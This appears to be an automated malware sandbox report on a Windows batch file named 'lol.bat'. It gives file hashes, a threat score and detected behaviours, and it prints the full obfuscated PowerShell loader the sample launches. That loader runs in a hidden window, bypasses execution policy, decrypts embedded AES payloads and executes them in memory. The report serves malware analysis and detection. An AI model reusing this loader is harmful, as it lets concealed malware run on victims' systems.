Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09-11-2024 16:16
Static task
static1
Behavioral task
behavioral1
Sample
lol.bat
Resource
win7-20240903-en
windows7-x64
4 signatures
150 seconds
General
-
Target
lol.bat
-
Size
279KB
-
MD5
b5c81dca8f6b148790d14c93ba1788d4
-
SHA1
11fa7bdf65ac8b835b27c895f3d3e357f87a28f2
-
SHA256
7772e47f23947ab8ec3ccd03173e02e73252b906cc780681447049e12d4cb9cb
-
SHA512
14bb171192854a481b7d26ec69e3dc7ffbe55755c3191629697298553ce919d5b1bd4719531b271304a530e5a01478bad0167f6fb66ae8d869da1f34b8713b51
-
SSDEEP
6144:5toA7r23ZOt+yxLqRvs+wAbTXJuE/SzXm3+gK+4QpTz:4AsOkmqTPbTJuEcmut+ppTz
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 316 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 316 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 1580 wrote to memory of 316 1580 cmd.exe 29 PID 1580 wrote to memory of 316 1580 cmd.exe 29 PID 1580 wrote to memory of 316 1580 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\lol.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6FKXqM4AWzehcRMiEtEBJSZ307MDhrlms/qR1ZbmvDU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xXq5NOPfLug2n5zZd7UfxA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gIuVu=New-Object System.IO.MemoryStream(,$param_var); $DStlk=New-Object System.IO.MemoryStream; $aEunE=New-Object System.IO.Compression.GZipStream($gIuVu, [IO.Compression.CompressionMode]::Decompress); $aEunE.CopyTo($DStlk); $aEunE.Dispose(); $gIuVu.Dispose(); $DStlk.Dispose(); $DStlk.ToArray();}function execute_function($param_var,$param2_var){ $RzZmF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dlKfW=$RzZmF.EntryPoint; $dlKfW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\lol.bat';$fQtTT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\lol.bat').Split([Environment]::NewLine);foreach ($zlOoi in $fQtTT) { if ($zlOoi.StartsWith(':: ')) { $QSoii=$zlOoi.Substring(3); break; }}$payloads_var=[string[]]$QSoii.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:316
-